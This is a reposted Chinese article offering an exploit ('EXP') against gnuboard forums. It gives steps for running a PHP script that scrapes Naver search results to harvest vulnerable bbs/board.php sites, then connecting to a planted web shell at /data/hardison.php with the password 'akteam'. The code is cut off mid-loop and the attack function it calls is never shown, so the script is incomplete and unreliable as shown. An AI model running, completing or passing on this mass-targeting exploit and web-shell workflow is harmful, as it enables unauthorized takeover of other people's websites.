韩国gnuboard论坛漏洞EXP及利用办法[网络技术]
本文“韩国gnuboard论坛漏洞EXP及利用办法[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
摘自红科网安
1.本机搭建PHP环境
2.将EXP程序保存为akt.php
3.CMD下履行php akt.php
4.产生的akt.txt中记录成功URL
5.http://目标URL/data/hardison.php 密码:akteam 用PHP衔接
EXP:
复制代码 <?php
echo" +----------------------------------------------------------------+\r\n";
echo" http://bbs.honkwin.com\r\n";
echo" +----------------------------------------------------------------+\r\n";
for ($ii=1;$ii<=99;$ii++)
{
$c=(int)$ii*10+1;
$a="web.search.naver.com";
$b="/search.naver?where=webkr&query=bbs/board.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10
&&qvt=0&sm=tab_pge";
get($a,$b);
}
function get($host,$file)
{
$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp) {
echo "SocketError: $errstr ($errno)\n";
return false;
}
$get = "GET $file HTTP/1.1\r\n";
$get .= "Host: $host\r\n";
$get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";
$get .= "Referer: http://$host\r\n";
$get .= "Connection: Close\r\n";
$get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";
fwrite($fp, $get);
$response=stream_get_contents($fp);
preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);
for ($i=0;$i<count($put[0]);$i++)
{
$a=(int)$i*3;
fuck($put[0][$a]);
//echo count($put[0]);
//print_r($put[0]);
//fuck($put[0][$i]);
break;
以上是“韩国gnuboard论坛漏洞EXP及利用办法[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
| 本文地址: | 与您的QQ/BBS好友分享! |
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“韩国gnuboard论坛漏洞EXP及利用办法”更多相关内容
中查找“韩国gnuboard论坛漏洞EXP及利用办法”更多相关内容